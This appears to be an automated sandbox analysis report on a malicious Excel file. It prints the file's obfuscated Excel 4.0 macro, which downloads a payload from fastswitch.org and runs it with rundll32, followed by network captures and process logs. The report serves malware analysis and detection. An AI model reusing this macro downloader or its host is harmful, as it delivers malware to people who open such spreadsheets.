                                                                                                                                                      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AE13(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AA13(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""UR""&AF21,AE19&AE20&AE21&AE22&AE23&AE24&AE25&AE26&AE27&AE28&AE29&AE30&AE31&AE32&AE33&AE34&AE35&AE14,""JJCCBB"",0,A100,AF18,AF23,0)",,,,"=FORMULA.ARRAY(AE17,AE14)","=FORMULA.ARRAY(AH25&AH26&AH27&AH28&AH29&AH30&AH31,AF14)","=FORMULA.ARRAY(AI25&AI26&AI27&AI28&AI29,AG14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,=AB17(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AF13(),=AG13(),=AA10(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AF14&""2 ""&AF18&AG14&""egisterServer"")",,,A,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,..\iojhsfgv.dvers,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,U,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,L,LMon,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,D,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,w,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,,,r,",",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,,,u,D,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,,,n,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,a,,,d,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,d,,,l,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,T,,,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,,,3,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,F,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,i,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,e,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,http://fastswitch.org/ds/0702.gif,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                                                                                                      Network Behavior

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Apr 9, 2021 22:15:42.186825991 CEST4971980192.168.2.347.244.191.15
                                                                                                                                                      Apr 9, 2021 22:15:42.378618002 CEST804971947.244.191.15192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:42.378830910 CEST4971980192.168.2.347.244.191.15
                                                                                                                                                      Apr 9, 2021 22:15:42.379492998 CEST4971980192.168.2.347.244.191.15
                                                                                                                                                      Apr 9, 2021 22:15:42.571316004 CEST804971947.244.191.15192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:43.153794050 CEST804971947.244.191.15192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:43.153953075 CEST4971980192.168.2.347.244.191.15
                                                                                                                                                      Apr 9, 2021 22:15:43.154078007 CEST4971980192.168.2.347.244.191.15
                                                                                                                                                      Apr 9, 2021 22:15:43.154798985 CEST804971947.244.191.15192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:43.155313969 CEST4971980192.168.2.347.244.191.15
                                                                                                                                                      Apr 9, 2021 22:15:43.346015930 CEST804971947.244.191.15192.168.2.3

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Apr 9, 2021 22:15:24.185971975 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:15:24.200273991 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:24.938477993 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:15:24.952486992 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:27.560693026 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:15:27.576196909 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:27.969465971 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:15:27.987314939 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:28.430540085 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:15:28.443387985 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:29.230902910 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:15:29.246026993 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:30.142323971 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:15:30.154938936 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:35.193039894 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:15:35.207129002 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:36.488794088 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:15:36.501733065 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:37.526259899 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:15:37.556615114 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:37.701097965 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:15:37.714060068 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:37.792170048 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:15:37.835942984 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:38.790208101 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:15:38.824587107 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:39.813925982 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:15:39.828330040 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:41.590482950 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:15:41.813584089 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:15:41.821321011 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:15:41.828146935 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:41.834445000 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:42.184216976 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:42.603959084 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:15:42.618019104 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:43.816652060 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:15:43.830914974 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:44.740545988 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:15:44.753290892 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:45.825716019 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:15:45.839242935 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:46.442559958 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:15:46.455194950 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:50.667709112 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:15:50.680354118 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:52.030697107 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:15:52.044888973 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:53.007030964 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:15:53.021831036 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:15:58.527745008 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:15:58.568217993 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:16:04.031272888 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:16:04.045207977 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:16:13.591427088 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:16:13.604279995 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:16:19.827982903 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:16:19.852520943 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:16:21.118035078 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:16:21.131710052 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:16:26.354219913 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:16:26.367702961 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:16:37.402400017 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:16:37.422379017 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:17:04.897092104 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:17:04.924545050 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                      Apr 9, 2021 22:17:22.339368105 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                      Apr 9, 2021 22:17:22.353188992 CEST53649388.8.8.8192.168.2.3

                                                                                                                                                      DNS Queries

                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                      Apr 9, 2021 22:15:41.590482950 CEST192.168.2.38.8.8.80x5f33Standard query (0)fastswitch.orgA (IP address)IN (0x0001)

                                                                                                                                                      DNS Answers

                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                      Apr 9, 2021 22:15:42.184216976 CEST8.8.8.8192.168.2.30x5f33No error (0)fastswitch.org47.244.191.15A (IP address)IN (0x0001)

                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                      • fastswitch.org

                                                                                                                                                      HTTP Packets

                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      0192.168.2.34971947.244.191.1580C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Apr 9, 2021 22:15:42.379492998 CEST779OUTGET /ds/0702.gif HTTP/1.1
                                                                                                                                                      Accept: */*
                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                      Host: fastswitch.org
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Apr 9, 2021 22:15:43.153794050 CEST1145INHTTP/1.1 503 Service Unavailable
                                                                                                                                                      Date: Fri, 09 Apr 2021 20:15:42 GMT
                                                                                                                                                      Server: Apache/2.4.6 (CentOS) PHP/5.6.31
                                                                                                                                                      X-Powered-By: PHP/5.6.31
                                                                                                                                                      Content-Length: 79
                                                                                                                                                      Connection: close
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 73 2f 30 37 30 32 2e 67 69 66 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e
                                                                                                                                                      Data Ascii: <h1>Not Found.</h1>The requested URL /ds/0702.gif was not found on this server.


                                                                                                                                                      Code Manipulations

                                                                                                                                                      Statistics

                                                                                                                                                      CPU Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Memory Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      General

                                                                                                                                                      Start time:22:15:35
                                                                                                                                                      Start date:09/04/2021
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                      Imagebase:0x1010000
                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:22:15:42
                                                                                                                                                      Start date:09/04/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:rundll32 ..\iojhsfgv.dvers,DllRegisterServer
                                                                                                                                                      Imagebase:0x180000
                                                                                                                                                      File size:61952 bytes
                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis

                                                                                                                                                      Reset < >